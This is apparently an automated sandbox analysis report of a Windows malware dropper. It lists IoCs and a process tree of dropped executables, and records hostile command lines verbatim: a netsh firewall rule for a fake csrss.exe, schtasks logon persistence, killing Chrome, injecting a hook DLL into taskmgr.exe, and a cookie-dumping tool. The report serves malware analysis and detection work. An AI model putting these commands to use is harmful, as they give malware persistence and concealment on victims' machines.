Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exemsedge.exeWerFault.exe

pid	process
4772	pub2.exe
4772	pub2.exe
4884	jfiag3g_gg.exe
4884	jfiag3g_gg.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3760	msedge.exe
3760	msedge.exe
3032
3032
3032
3032
3780	WerFault.exe
3780	WerFault.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4772 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

228 msedge.exe
228 msedge.exe
228 msedge.exe
228 msedge.exe

pid	process
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeSoCleanInst.exetaskkill.exemd9_1sjm.exeWerFault.exe

description	pid	process
Token: SeCreateTokenPrivilege	2936	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2936	Install.exe
Token: SeLockMemoryPrivilege	2936	Install.exe
Token: SeIncreaseQuotaPrivilege	2936	Install.exe
Token: SeMachineAccountPrivilege	2936	Install.exe
Token: SeTcbPrivilege	2936	Install.exe
Token: SeDebugPrivilege	4780	SoCleanInst.exe
Token: SeSecurityPrivilege	2936	Install.exe
Token: SeTakeOwnershipPrivilege	2936	Install.exe
Token: SeLoadDriverPrivilege	2936	Install.exe
Token: SeSystemProfilePrivilege	2936	Install.exe
Token: SeSystemtimePrivilege	2936	Install.exe
Token: SeProfSingleProcessPrivilege	2936	Install.exe
Token: SeIncBasePriorityPrivilege	2936	Install.exe
Token: SeCreatePagefilePrivilege	2936	Install.exe
Token: SeCreatePermanentPrivilege	2936	Install.exe
Token: SeBackupPrivilege	2936	Install.exe
Token: SeRestorePrivilege	2936	Install.exe
Token: SeShutdownPrivilege	2936	Install.exe
Token: SeDebugPrivilege	2936	Install.exe
Token: SeAuditPrivilege	2936	Install.exe
Token: SeSystemEnvironmentPrivilege	2936	Install.exe
Token: SeChangeNotifyPrivilege	2936	Install.exe
Token: SeRemoteShutdownPrivilege	2936	Install.exe
Token: SeUndockPrivilege	2936	Install.exe
Token: SeSyncAgentPrivilege	2936	Install.exe
Token: SeEnableDelegationPrivilege	2936	Install.exe
Token: SeManageVolumePrivilege	2936	Install.exe
Token: SeImpersonatePrivilege	2936	Install.exe
Token: SeCreateGlobalPrivilege	2936	Install.exe
Token: 31	2936	Install.exe
Token: 32	2936	Install.exe
Token: 33	2936	Install.exe
Token: 34	2936	Install.exe
Token: 35	2936	Install.exe
Token: SeDebugPrivilege	3600	taskkill.exe
Token: SeManageVolumePrivilege	1456	md9_1sjm.exe
Token: SeRestorePrivilege	3780	WerFault.exe
Token: SeBackupPrivilege	3780	WerFault.exe
Token: SeBackupPrivilege	3780	WerFault.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

msedge.exe

pid process

3032
3032
228 msedge.exe
3032
228 msedge.exe
3032
3032
3032
3032

pid	process
3032
3032
228	msedge.exe
3032
228	msedge.exe
3032
3032
3032
3032

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exeFolder.exeFiles.exemsedge.exeInstall.execmd.exerUNdlL32.eXeWerFault.exe

description	pid	process	target process
PID 2588 wrote to memory of 4780	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	SoCleanInst.exe
PID 2588 wrote to memory of 4780	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	SoCleanInst.exe
PID 2588 wrote to memory of 1456	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	md9_1sjm.exe
PID 2588 wrote to memory of 1456	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	md9_1sjm.exe
PID 2588 wrote to memory of 1456	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	md9_1sjm.exe
PID 2588 wrote to memory of 2708	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Folder.exe
PID 2588 wrote to memory of 2708	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Folder.exe
PID 2588 wrote to memory of 2708	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Folder.exe
PID 2588 wrote to memory of 4668	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Info.exe
PID 2588 wrote to memory of 4668	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Info.exe
PID 2588 wrote to memory of 4668	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Info.exe
PID 2588 wrote to memory of 4404	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Updbdate.exe
PID 2588 wrote to memory of 4404	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Updbdate.exe
PID 2588 wrote to memory of 4404	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Updbdate.exe
PID 2588 wrote to memory of 2936	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Install.exe
PID 2588 wrote to memory of 2936	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Install.exe
PID 2588 wrote to memory of 2936	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Install.exe
PID 2588 wrote to memory of 4960	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Files.exe
PID 2588 wrote to memory of 4960	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Files.exe
PID 2588 wrote to memory of 4960	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	Files.exe
PID 2588 wrote to memory of 4772	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	pub2.exe
PID 2588 wrote to memory of 4772	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	pub2.exe
PID 2588 wrote to memory of 4772	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	pub2.exe
PID 2588 wrote to memory of 2452	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	File.exe
PID 2588 wrote to memory of 2452	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	File.exe
PID 2588 wrote to memory of 2452	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	File.exe
PID 2708 wrote to memory of 2568	2708	Folder.exe	Folder.exe
PID 2708 wrote to memory of 2568	2708	Folder.exe	Folder.exe
PID 2708 wrote to memory of 2568	2708	Folder.exe	Folder.exe
PID 4960 wrote to memory of 2064	4960	Files.exe	jfiag3g_gg.exe
PID 4960 wrote to memory of 2064	4960	Files.exe	jfiag3g_gg.exe
PID 4960 wrote to memory of 2064	4960	Files.exe	jfiag3g_gg.exe
PID 2588 wrote to memory of 228	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	msedge.exe
PID 2588 wrote to memory of 228	2588	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe	msedge.exe
PID 228 wrote to memory of 220	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 220	228	msedge.exe	msedge.exe
PID 2936 wrote to memory of 4756	2936	Install.exe	cmd.exe
PID 2936 wrote to memory of 4756	2936	Install.exe	cmd.exe
PID 2936 wrote to memory of 4756	2936	Install.exe	cmd.exe
PID 4756 wrote to memory of 3600	4756	cmd.exe	taskkill.exe
PID 4756 wrote to memory of 3600	4756	cmd.exe	taskkill.exe
PID 4756 wrote to memory of 3600	4756	cmd.exe	taskkill.exe
PID 3892 wrote to memory of 480	3892	rUNdlL32.eXe	rundll32.exe
PID 3892 wrote to memory of 480	3892	rUNdlL32.eXe	rundll32.exe
PID 3892 wrote to memory of 480	3892	rUNdlL32.eXe	rundll32.exe
PID 4960 wrote to memory of 4884	4960	Files.exe	jfiag3g_gg.exe
PID 4960 wrote to memory of 4884	4960	Files.exe	jfiag3g_gg.exe
PID 4960 wrote to memory of 4884	4960	Files.exe	jfiag3g_gg.exe
PID 2840 wrote to memory of 480	2840	WerFault.exe	rundll32.exe
PID 2840 wrote to memory of 480	2840	WerFault.exe	rundll32.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 4840	228	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe
"C:\Users\Admin\AppData\Local\Temp\35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2588

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2708

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2568

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 368
3⤵
- Program crash
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 372
3⤵
- Program crash
PID:60

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 396
3⤵
- Program crash
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 664
3⤵
- Program crash
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 708
3⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 664
3⤵
- Program crash
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 728
3⤵
- Program crash
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 736
3⤵
- Program crash
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 748
3⤵
- Program crash
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 688
3⤵
- Program crash
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 748
3⤵
- Program crash
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 748
3⤵
- Program crash
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 876
3⤵
- Program crash
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 876
3⤵
- Program crash
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 816
3⤵
- Program crash
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 832
3⤵
- Program crash
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 816
3⤵
- Program crash
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 816
3⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 852
3⤵
- Program crash
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 888
3⤵
- Program crash
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 892
3⤵
- Program crash
PID:4780

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 332
4⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 336
4⤵
- Program crash
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 336
4⤵
- Program crash
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 616
4⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 616
4⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 616
4⤵
- Program crash
PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 616
4⤵
- Program crash
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 700
4⤵
- Program crash
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 724
4⤵
- Program crash
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 716
4⤵
- Program crash
PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 580
4⤵
- Program crash
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 892
4⤵
- Program crash
PID:5272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 908
4⤵
- Program crash
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 912
4⤵
- Program crash
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 852
4⤵
- Program crash
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 776
4⤵
- Program crash
PID:5544

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:5584

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:5640

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 368
5⤵
- Program crash
PID:5152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 372
5⤵
- Program crash
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 372
5⤵
- Program crash
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 604
5⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 696
5⤵
- Program crash
PID:5376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 720
5⤵
- Program crash
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 736
5⤵
- Program crash
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 744
5⤵
- Program crash
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 756
5⤵
- Program crash
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 628
5⤵
- Program crash
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 820
5⤵
- Program crash
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 928
5⤵
- Program crash
PID:4752

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 928
5⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 864
5⤵
- Program crash
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 956
5⤵
- Program crash
PID:1168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 956
5⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1000
5⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 992
5⤵
- Program crash
PID:2908

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 752
5⤵
- Program crash
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 948
5⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1220
5⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4404

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4756

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4960

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2064

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4884

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4772

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:2452

C:\Users\Admin\Pictures\Adobe Films\TUUDIht0amfahOK6j4PYMVKS.exe
"C:\Users\Admin\Pictures\Adobe Films\TUUDIht0amfahOK6j4PYMVKS.exe"
3⤵
- Executes dropped EXE
PID:5272

C:\Users\Admin\Pictures\Adobe Films\HnhmWAXA1vv_sVba7bhB_zYb.exe
"C:\Users\Admin\Pictures\Adobe Films\HnhmWAXA1vv_sVba7bhB_zYb.exe"
3⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 424
4⤵
- Program crash
PID:3340

C:\Users\Admin\Pictures\Adobe Films\Y8MG7AP1OZh_82Q6ZWOjoCw5.exe
"C:\Users\Admin\Pictures\Adobe Films\Y8MG7AP1OZh_82Q6ZWOjoCw5.exe"
3⤵
PID:5344

C:\Users\Admin\Documents\LX5L3efJiECIrcL23P74Bc6Y.exe
"C:\Users\Admin\Documents\LX5L3efJiECIrcL23P74Bc6Y.exe"
4⤵
PID:6416

C:\Users\Admin\Pictures\Adobe Films\Ep4aUN7ZRerLjs8tNQAMa9XE.exe
"C:\Users\Admin\Pictures\Adobe Films\Ep4aUN7ZRerLjs8tNQAMa9XE.exe"
5⤵
PID:2552

C:\Users\Admin\Pictures\Adobe Films\cxPksyaUpIteCd1Y7ewRFYZX.exe
"C:\Users\Admin\Pictures\Adobe Films\cxPksyaUpIteCd1Y7ewRFYZX.exe"
5⤵
PID:6684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 624
6⤵
PID:5404

C:\Users\Admin\Pictures\Adobe Films\c5yLHJ6Dk58lrzQpZv03wZyn.exe
"C:\Users\Admin\Pictures\Adobe Films\c5yLHJ6Dk58lrzQpZv03wZyn.exe"
5⤵
PID:7136

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
6⤵
PID:3720

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
7⤵
PID:3348

C:\Users\Admin\Pictures\Adobe Films\nJzqeDwJSOWRuCFDI5nEYAH7.exe
"C:\Users\Admin\Pictures\Adobe Films\nJzqeDwJSOWRuCFDI5nEYAH7.exe"
5⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\7zS68B.tmp\Install.exe
.\Install.exe
6⤵
PID:560

C:\Users\Admin\Pictures\Adobe Films\TO6XosCOPEWgNMbksxtJ3Opv.exe
"C:\Users\Admin\Pictures\Adobe Films\TO6XosCOPEWgNMbksxtJ3Opv.exe"
5⤵
PID:5160

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:6564

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:6480

C:\Users\Admin\Pictures\Adobe Films\G9Yz3uMK4MCc_dmyA1b2v5Yf.exe
"C:\Users\Admin\Pictures\Adobe Films\G9Yz3uMK4MCc_dmyA1b2v5Yf.exe"
3⤵
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 640
4⤵
- Program crash
PID:6744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 636
4⤵
- Program crash
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 640
4⤵
PID:1616

C:\Users\Admin\Pictures\Adobe Films\naSvFb2QClCjQ5eFC8FSDwul.exe
"C:\Users\Admin\Pictures\Adobe Films\naSvFb2QClCjQ5eFC8FSDwul.exe"
3⤵
PID:4036

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
4⤵
PID:6392

C:\Users\Admin\Pictures\Adobe Films\8jffLaSYgYztlkkIG3gY9mUD.exe
"C:\Users\Admin\Pictures\Adobe Films\8jffLaSYgYztlkkIG3gY9mUD.exe"
3⤵
PID:1960

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
4⤵
PID:7032

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
5⤵
PID:6376

C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe
